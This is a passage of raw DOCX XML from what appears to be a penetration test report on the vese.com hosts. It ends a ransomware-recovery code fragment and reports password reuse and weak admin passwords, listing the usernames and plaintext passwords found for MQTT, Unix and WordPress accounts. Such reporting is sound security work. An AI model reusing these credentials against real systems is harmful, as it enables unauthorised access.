                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t xml:space="preserve">        with </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t>open(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t>file, "</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t>wb</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t>") as f:</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="6E9AB2DC" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:pBdr>
                      <w:top w:val="nil"/>
                      <w:left w:val="nil"/>
                      <w:bottom w:val="nil"/>
                      <w:right w:val="nil"/>
                      <w:between w:val="nil"/>
                    </w:pBdr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t xml:space="preserve">            </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t>f.write</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t>(decrypted)</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="241EE94B" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>delete the ransomware script</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="096AE1DA" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="64671E97" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_heading=h.82y49tslnzhs" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Password reuse between users/applications</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>(High Severity)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630D821C" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af5"/>
        <w:tblW w:w="10080" w:type="dxa"/>
        <w:tblInd w:w="-7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2"/>
        <w:gridCol w:w="8208"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="02A4E984" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE"/>
          </w:tcPr>
          <w:p w14:paraId="184564A9" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720" w:right="-170" w:hanging="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
              <w:t>Description:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39335DDE" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:t>Some passwords have been used for multiple administrative accounts for the assessed target applications. This allows an attacker that obtained one of these passwords to use them for further movement and possible privilege escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="3952F583" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE"/>
          </w:tcPr>
          <w:p w14:paraId="0B9F1498" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720" w:right="-170" w:hanging="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
              <w:t>Impact:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
          </w:tcPr>
          <w:p w14:paraId="70E5C211" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="1C7187EC" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE"/>
          </w:tcPr>
          <w:p w14:paraId="3EA16A26" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720" w:right="-170" w:hanging="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
              <w:t>System:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5171F930" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:t>Host: vese.com, internal.vese.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="6F8929AB" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="413"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE"/>
          </w:tcPr>
          <w:p w14:paraId="4A782846" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720" w:right="-170" w:hanging="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
              <w:t>References:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7EADE077" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
            </w:pPr>
            <w:hyperlink r:id="rId34">
              <w:r>
                <w:rPr>
                  <w:color w:val="1155CC"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t>https://www.intertek.com/blog/2022-08-23-cybersecurity/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7C106972" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2">
      <w:pPr>
        <w:ind w:right="1"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CAA4303" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:right="1"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Exploitation Proof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD982A9" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:r>
        <w:t>The following users use the same password:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15766C8E" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>MQTT Service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2F5149" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">User: patron Password: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eL_Administrador_dE_SisteMaS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="614E4538" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Unix:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C25E2C" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">User: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>johnsysadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Password: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eL_Administrador_dE_SisteMaS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="45A375E2" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2"/>
    <w:p w14:paraId="2AEE25E9" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>internal.vese.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D312813" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">User: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eladministrador</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Password: windfarm123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DB1EDF" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">vese.com </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wordpress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3C0CCE" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">User: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ElAdministrador</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Password: windfarm123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C412BB" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af6"/>
        <w:tblW w:w="10080" w:type="dxa"/>
        <w:tblInd w:w="-7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2"/>
        <w:gridCol w:w="8208"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="7AFFA5B4" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE"/>
          </w:tcPr>
          <w:p w14:paraId="1D0F45E2" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720" w:right="-170" w:hanging="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
              <w:t>Who:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DF8C08C" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:t>IT Team</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="261ACCC7" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE"/>
          </w:tcPr>
          <w:p w14:paraId="3C84EB7E" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720" w:right="-170" w:hanging="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
              <w:t>Vector:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="524B196A" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:t>Remote</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="776CBDF7" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE"/>
          </w:tcPr>
          <w:p w14:paraId="6D2EBCE4" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720" w:right="-170" w:hanging="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
              <w:t>Action:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3511656C" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:t>Change shared passwords for administrative accounts and avoid using them in the future.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="21C0B5DA" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_heading=h.8aw84khq61f3" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="790D2F41" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_heading=h.trjclxa6xwjt" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Use of easily guessable passwords</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>(High Severity)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DAC043" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af7"/>
        <w:tblW w:w="10080" w:type="dxa"/>
        <w:tblInd w:w="-7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2"/>
        <w:gridCol w:w="8208"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="66852EA6" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE"/>
          </w:tcPr>
          <w:p w14:paraId="280E7055" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720" w:right="-170" w:hanging="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
              <w:t>Description:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4CF823E0" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:t>Some passwords for administrative users are easily guessable or recoverable through enumeration.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="4452E055" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE"/>
          </w:tcPr>
          <w:p w14:paraId="1E5B9430" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720" w:right="-170" w:hanging="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
              <w:t>Impact:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
          </w:tcPr>
          <w:p w14:paraId="3A50AEE8" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="44A7A942" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE"/>
          </w:tcPr>
          <w:p w14:paraId="3A7505DB" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720" w:right="-170" w:hanging="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
              <w:t>System:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="366E6865" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:t>Host: vese.com, internal.vese.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="6A944886" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="413"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE"/>
          </w:tcPr>
          <w:p w14:paraId="6F151626" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720" w:right="-170" w:hanging="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
              <w:t>References:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16FFB375" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
            </w:pPr>
            <w:hyperlink r:id="rId35">
              <w:r>
